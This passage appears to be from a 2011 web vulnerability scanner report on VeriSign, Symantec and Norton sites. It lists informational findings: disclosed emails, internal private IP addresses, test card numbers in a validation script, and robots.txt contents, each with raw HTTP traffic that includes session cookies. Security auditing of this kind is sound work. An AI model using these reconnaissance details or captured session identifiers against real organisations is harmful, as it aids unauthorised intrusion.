GET / HTTP/1.1 Host: www.verisign.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:30:44 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:30:44 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 34637 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
17.71. https://www.verisign.com/products-services/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://www.verisign.com
Path: /products-services/index.html
Issue detail
The following email address was disclosed in the response: channel-partners@verisign.com
Request
GET /products-services/index.html HTTP/1.1 Host: www.verisign.com Connection: keep-alive Referer: https://securitycenter.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:46 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 107427 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="https://cdn.verisign.com/assets/shared/css/header.css" rel="styleshee...[SNIP]... <a href='mailto:channel-partners@verisign.com ?tid=gnpartners'>...[SNIP]...
18. Private IP addresses disclosed
There are 3 instances of this issue:
Issue background
RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways. Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.
Issue remediation
There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.
18.1. http://query.verisign.com/cluster.js
Summary
Severity: Information
Confidence: Certain
Host: http://query.verisign.com
Path: /cluster.js
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /cluster.js HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:45 GMT Content-Type: application/x-javascript Last-Modified: Mon, 02 Nov 2009 13:15:17 GMT Content-Length: 8783 Cache-Control: public, max-age=31622400 Expires: Sun, 09 Sep 2012 21:24:45 GMT Vary: Accept-Encoding // Copyright 2006 Google Inc., All Rights Reserved // dspencer@google.com /** * @fileoverview * * This file is for the rendering of Clustered Search results * on the GSA. * * * The flow is:...[SNIP]... put=xml_no_dtd&sort=date%3AD%3AL%3Ad1& * ie=UTF-8&btnG=Google+Search&client=f7&q=china&ud=1& * site=default_collection&oe=UTF-8&proxystylesheet=f7& * ip=172.18.68.100 " * * @param {Function} render: The rendering function which is called on * completion with 2 arguments, the search URL (the arg above) and the JSON * blob that comes back from the CS. *...[SNIP]...
18.2. http://query.verisign.com/search
Summary
Severity: Information
Confidence: Certain
Host: http://query.verisign.com
Path: /search
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend HTTP/1.1 Host: query.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:07 GMT Server: saws Cache-Control: private Content-Type: text/html Vary: Accept-Encoding Content-Length: 52678 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <body onload="pruneHeaders();resetForms(); cs_loadClusters('q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108 &access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1', cs_drawClusters); " dir="ltr">...[SNIP]... itesearch=https://knowledge.verisign.com/support/mpki-for-ssl-support/index&q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108 &access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1">...[SNIP]... earch=https://knowledge.verisign.com/support/ssl-certificates-support/index&q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108 &access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1">...[SNIP]... <a href="search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.108 &access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1&filter=0">...[SNIP]...
18.3. https://query.verisign.com/search
Summary
Severity: Information
Confidence: Certain
Host: https://query.verisign.com
Path: /search
Issue detail
The following RFC 1918 IP address was disclosed in the response:
Request
GET /search HTTP/1.1 Host: query.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:20 GMT Server: saws Cache-Control: private Content-Type: text/html Content-Length: 44676 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html><head> <meta name="robots" content="NOINDEX,NOFOLLOW"> <meta http-equiv="X-UA-Compatible" content="IE=7"> <meta http-equiv="c...[SNIP]... <body onload="pruneHeaders();resetForms(); cs_loadClusters('site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend&ie=UTF-8&ip=10.244.28.107 &access=p&sort=date%3AD%3AL%3Ad1&entqr=1&entsp=0&oe=UTF-8&ud=1', cs_drawClusters); " dir="ltr">...[SNIP]...
19. Credit card numbers disclosed
There are 2 instances of this issue:
Issue background
Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.
19.1. https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/js/commonValidation2-9-06.js
Issue detail
The following credit card number was disclosed in the response:
Request
GET /renewals/js/commonValidation2-9-06.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 32366 Last-Modified: Thu, 18 Mar 2010 01:42:32 GMT Accept-Ranges: bytes // $Id: commonValidation2-9-06.js 82 2008-01-30 00:07:20Z mhallesy $ //please do not make changes to this file! //if you need to modify it, please make a copy, since this script is used by multipl...[SNIP]... Reverse(n); var total = AddedTogether(reversed); if(total % 10 > 0) { return 0; } return 1; } // Mod10() function CheckTestCard(n) { isTest = false; if (n == ("4567765445677654" || "4321123443211234 ")) { isTest = true;} return isTest; } // CheckTestCard function ValidateCC(formContents) { ccNumberChecked = StripNonDigits(formContents); ccType = GetType(ccNumberChecked); ccNumb...[SNIP]...
19.2. http://us.norton.com/content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf
Issue detail
The following credit card number was disclosed in the response:
Request
GET /content/en/us/home_homeoffice/media/pdf/norton_cybercrime_exposed_booklet.pdf HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 720962 Last-Modified: Thu, 08 Oct 2009 21:38:05 GMT ETag: "b0042-4ace5bbd" Accept-Ranges: bytes Content-Type: application/pdf Cache-Control: public, max-age=2171 Date: Fri, 09 Sep 2011 21:47:13 GMT Connection: close %PDF-1.4%.... 115 0 obj<</Linearized 1/L 704881/O 117/E 187596/N 20/T 702538/H [ 916 745]>>endobj xref115 310000000016 00000 n 0000001661 00000 n 0000001763 00000 n 0000002280 0...[SNIP]... 645 549 504 632 670 276 437 583 511 797 664 0 563 663 585 550 518 648 580 832 0 527 0 0 0 0 0 431 0 510 546 458 546 491 327 508 551 258 258 487 258 816 551 520 546 546 367 446 340 551 459 689 457 462 439 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 250 408 408 0 0 969 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 799 0 0 0 0 453]/BaseFont/IVAHPG+SymantecSansLight/FirstChar 32/ToUnicode 80 0 R/Encoding/WinAnsiEncoding/Type/Font>...[SNIP]...
20. Robots.txt file
There are 47 instances of this issue:
Issue background
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index. The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
20.1. http://1168.ic-live.com/goat.php
Summary
Severity: Information
Confidence: Certain
Host: http://1168.ic-live.com
Path: /goat.php
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: 1168.ic-live.com
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:26:17 GMT Server: Apache Last-Modified: Mon, 08 Aug 2011 21:54:33 GMT ETag: "37843a-72f-4aa057e0a3840" Accept-Ranges: bytes Content-Length: 1839 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml" Content-Type: text/plain X-Cache: MISS from i2a-coll-7 X-Cache-Lookup: MISS from i2a-coll-7:80 Via: 1.0 i2a-coll-7:80 (squid/2.6.STABLE21) Connection: close ...User-agent: * Disallow: /allCountryCodes.txt Disallow: /altidconv.php Disallow: /backup/ Disallow: /bugs-dec16.tar Disallow: /cgi-bin/ Disallow: /checktime.php Disallow: /client-kit/ Disallow: /com...[SNIP]...
20.2. http://admin.instantservice.com/resources/smartbutton/5851/42379/available.gif
Summary
Severity: Information
Confidence: Certain
Host: http://admin.instantservice.com
Path: /resources/smartbutton/5851/42379/available.gif
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: admin.instantservice.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT ETag: "1a-887f66c0" Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding,User-Agent P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/plain; charset=iso-8859-1 User-agent: * Disallow: /
20.3. https://admin.instantservice.com/links/5851/14753
Summary
Severity: Information
Confidence: Certain
Host: https://admin.instantservice.com
Path: /links/5851/14753
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: admin.instantservice.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:50 GMT Server: Apache Last-Modified: Thu, 14 Jul 2011 18:16:35 GMT ETag: "1a-887f66c0" Accept-Ranges: bytes Content-Length: 26 Vary: Accept-Encoding,User-Agent P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/plain; charset=iso-8859-1 User-agent: * Disallow: /
20.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png
Summary
Severity: Information
Confidence: Certain
Host: http://blogs.verisign.com
Path: /authweb/global/assets/shared/images/nav/nav_grad.png
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: blogs.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:11 GMT Server: Apache Last-Modified: Wed, 05 Mar 2008 18:53:14 GMT ETag: "1a6035a-21-221fba80" Accept-Ranges: bytes Content-Length: 33 Content-Type: text/plain; charset=UTF-8 Connection: close User-agent: * Disallow: /stooge/
20.5. http://buy-static.norton.com/estore/images/master/misc/gradient_background.gif
Summary
Severity: Information
Confidence: Certain
Host: http://buy-static.norton.com
Path: /estore/images/master/misc/gradient_background.gif
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: buy-static.norton.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a Last-Modified: Mon, 23 Aug 2010 19:28:11 GMT ETag: "1f84c4-1c-48e82a62248c0" Accept-Ranges: bytes Content-Length: 28 Content-Type: text/plain Date: Fri, 09 Sep 2011 21:31:19 GMT Connection: close User-agent: * Disallow: /
20.6. https://buy-static.norton.com/estore/images/en/Non-Product/Misc/LiveChat/
Summary
Severity: Information
Confidence: Certain
Host: https://buy-static.norton.com
Path: /estore/images/en/Non-Product/Misc/LiveChat/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: buy-static.norton.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a Last-Modified: Fri, 20 Aug 2010 19:33:33 GMT ETag: "5e44c4-1c-48e465fcd7d40" Accept-Ranges: bytes Content-Length: 28 Content-Type: text/plain Date: Fri, 09 Sep 2011 21:37:23 GMT Connection: close User-agent: * Disallow: /
20.7. http://buy.norton.com/
Summary
Severity: Information
Confidence: Certain
Host: http://buy.norton.com
Path: /
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: buy.norton.com
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 09 Sep 2011 21:31:16 GMT Content-Length: 34 Content-Type: text/html X-Powered-By: Servlet/2.5 JSP/2.1 User-agent: * <br>Disallow: / <br>
20.8. http://cdn.verisign.com/assets/trust-seal/css/hp.css
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.verisign.com
Path:
/assets/trust-seal/css/hp.css
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: cdn.verisign.com
Response
HTTP/1.0 200 OK Server: Apache ETag: "29ac2fd-9eb-49a38fa8970c0" Accept-Ranges: bytes Content-Type: text/plain Age: 3946 Date: Fri, 09 Sep 2011 21:26:14 GMT Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT Expires: Sun, 09 Oct 2011 20:20:28 GMT Content-Length: 2539 Connection: close User-Agent: * Disallow: /aol/ Disallow: /att/ Disallow: /authentic/ Disallow: /aventail/ Disallow: /b2b/ Disallow: /cd/ Disallow: /cdrom/ Disallow: /cgi-bin/ Disallow: /checkpoint/ Disallow: /client/...[SNIP]...
20.9. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
Summary
Severity:
Information
Confidence:
Certain
Host:
https://cdn.verisign.com
Path:
/authweb/global/assets/shared/js/jquery.cacheimage.js
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: cdn.verisign.com
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/plain Connection: close ETag: "28e934c-9eb-49a38fa8970c0" Accept-Ranges: bytes Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 2539 User-Agent: * Disallow: /aol/ Disallow: /att/ Disallow: /authentic/ Disallow: /aventail/ Disallow: /b2b/ Disallow: /cd/ Disallow: /cdrom/ Disallow: /cgi-bin/ Disallow: /checkpoint/ Disallow: /client/...[SNIP]...
20.10. http://ch.norton.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ch.norton.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: ch.norton.com
Response
HTTP/1.0 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Length: 534 Last-Modified: Thu, 29 Jul 2010 20:29:17 GMT ETag: "216-4c51e49d" Accept-Ranges: bytes Content-Type: text/plain;charset=UTF-8 Cache-Control: public, max-age=14107 Date: Fri, 09 Sep 2011 21:41:25 GMT Connection: close User-agent:* Disallow:/common/ Disallow:/content/ Disallow:/corp/ Disallow:/css/ Disallow:/ssi/ Disallow:/lib/ Disallow:/errors/ Disallow:/feedback/ Disallow:/media/ Disallow:/script/ Disal...[SNIP]...
20.11. http://com-verisign.netmng.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://com-verisign.netmng.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: com-verisign.netmng.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:40 GMT Server: Apache/2.2.9 Last-Modified: Tue, 06 Apr 2010 14:04:58 GMT ETag: "1c44a1-1a-48391ee477680" Accept-Ranges: bytes Content-Length: 26 Connection: close Content-Type: text/plain User-agent: * Disallow: /
20.12. http://community.norton.com/norton/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://community.norton.com
Path:
/norton/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: community.norton.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:45 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b Last-Modified: Fri, 09 Sep 2011 07:04:51 GMT ETag: "82786-17b-4ac7ccb32122c" Accept-Ranges: bytes Content-Length: 379 Vary: Accept-Encoding Connection: close Content-Type: text/plain # Default Generated robots.txt file User-agent: * Crawl-delay: 5 Disallow: /t5/forums/forumtopicprintpage Disallow: /t5/ideas/ideaprintpage Disallow: /t5/blogs/blogarticleprintpage Disallow: /t5/help...[SNIP]...
20.13. http://de.community.norton.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://de.community.norton.com
Path:
/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: de.community.norton.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:41:49 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Last-Modified: Fri, 09 Sep 2011 02:17:05 GMT ETag: "35c1329-199-4ac78c6034a40" Accept-Ranges: bytes Content-Length: 409 Vary: Accept-Encoding Connection: close Content-Type: text/plain # Default Generated robots.txt file User-agent: * Crawl-delay: 5 Disallow: /t5/forums/forumtopicprintpage Disallow: /t5/ideas/ideaprintpage Disallow: /t5/blogs/blogarticleprintpage Disallow: /t5/help...[SNIP]...
20.14. https://drh.img.digitalriver.com/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/
Summary
Severity:
Information
Confidence:
Certain
Host:
https://drh.img.digitalriver.com
Path:
/DRHM/Storefront/Site/symnasmb/pb/images/LivePerson/proactive2/Chat/Store/Challenger/
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: drh.img.digitalriver.com
Response
HTTP/1.0 200 OK ETag: "49-3ebbc10b" Content-Type: text/plain Last-Modified: Fri, 09 May 2003 14:54:03 GMT Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=0+0;age=0;ecid=94643838326,0) Content-Length: 73 P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE" X-Server-Name: gcweb04@dc1app59 Accept-Ranges: bytes Date: Fri, 09 Sep 2011 21:41:50 GMT Connection: close User-agent: Ultraseek Disallow: / User-agent: Inktomi Search Disallow: /
20.15. http://gs.instantservice.com/geoipAPI.js
Summary
Severity:
Information
Confidence:
Certain
Host:
http://gs.instantservice.com
Path:
/geoipAPI.js
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: gs.instantservice.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:14 GMT Server: Apache Last-Modified: Thu, 14 Jul 2011 18:15:35 GMT ETag: "21f297-1a-84ebdfc0" Accept-Ranges: bytes Content-Length: 26 P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/plain; charset=ISO-8859-1 User-agent: * Disallow: /
20.16. http://investor.symantec.com/phoenix.zhtml
Summary
Severity:
Information
Confidence:
Certain
Host:
http://investor.symantec.com
Path:
/phoenix.zhtml
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: investor.symantec.com
Response
HTTP/1.0 200 OK Content-Length: 499 Content-Type: text/plain Last-Modified: Fri, 09 Sep 2011 12:00:00 GMT Accept-Ranges: bytes ETag: "03eb00e86ecc1:3239" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Expires: Fri, 09 Sep 2011 21:42:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:42:04 GMT Connection: close # ========v2.7 - 1/20/11=========================# # =====Block all bots except below entries between 8am and 8pm EST=====# User-agent: fusionbot Disallow: /preview Disallow: /redesign Disallow...[SNIP]...
20.17. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.ch
Path:
/support/ssl-certificates-support/index.html
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: knowledge.verisign.ch
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:42:30 GMT Server: Apache Last-Modified: Wed, 01 Jun 2011 21:13:13 GMT ETag: "b690c1-3c-4a4acfd02ec40" Accept-Ranges: bytes Content-Length: 60 Connection: close Content-Type: text/plain User-agent: gsa-crawler Allow: / User-agent: * Disallow: /
20.18. https://knowledge.verisign.com/favicon.ico
Summary
Severity:
Information
Confidence:
Certain
Host:
https://knowledge.verisign.com
Path:
/favicon.ico
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: knowledge.verisign.com
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:13 GMT Server: Apache Last-Modified: Wed, 01 Jun 2011 21:12:44 GMT ETag: "34ceb-3c-4a4acfb486b00" Accept-Ranges: bytes Content-Length: 60 Connection: close Content-Type: text/plain User-agent: gsa-crawler Allow: / User-agent: * Disallow: /
20.19. http://l.addthiscdn.com/live/t00/200lo.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
http://l.addthiscdn.com
Path:
/live/t00/200lo.gif
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: l.addthiscdn.com
Response
HTTP/1.0 200 OK Server: Apache Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT ETag: "df8ab7-1b-4a51dabdf10c0" Content-Type: text/plain; charset=UTF-8 Date: Fri, 09 Sep 2011 21:26:10 GMT Content-Length: 27 Connection: close User-agent: * Disallow: *
20.20. http://mbox3.offermatica.com/m2/verisign/ubox/image
Summary
Severity:
Information
Confidence:
Certain
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/ubox/image
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: mbox3.offermatica.com
Response
HTTP/1.1 200 OK Server: Test & Target Content-Type: text/plain Date: Fri, 09 Sep 2011 21:24:34 GMT Accept-Ranges: bytes ETag: W/"25-1309299047000" Connection: close Last-Modified: Tue, 28 Jun 2011 22:10:47 GMT Content-Length: 25 User-agent: * Disallow: /
20.21. http://om.symantec.com/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836
Summary
Severity:
Information
Confidence:
Certain
Host:
http://om.symantec.com
Path:
/b/ss/veritasnonconsumer,symantecabout/1/H.22.1/s62617202242836
Issue detail
The web server contains a robots.txt file.
Request
GET /robots.txt HTTP/1.0 Host: om.symantec.com
Response
